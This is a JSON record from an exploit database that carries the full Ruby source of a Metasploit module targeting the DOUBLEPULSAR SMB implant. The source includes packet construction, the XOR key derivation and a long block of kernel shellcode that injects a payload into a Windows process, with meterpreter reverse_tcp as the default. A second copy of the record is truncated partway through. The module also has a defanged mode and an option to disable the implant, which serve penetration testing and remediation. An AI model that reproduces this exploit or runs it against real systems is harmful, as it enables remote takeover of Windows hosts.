{"value": 7.8, "vector": "NONE", "modified": "2021-11-04T22:15:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-05] #"}, "lastseen": "2021-11-04T22:15:36", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-07T11:46:19", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", 
"EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => 
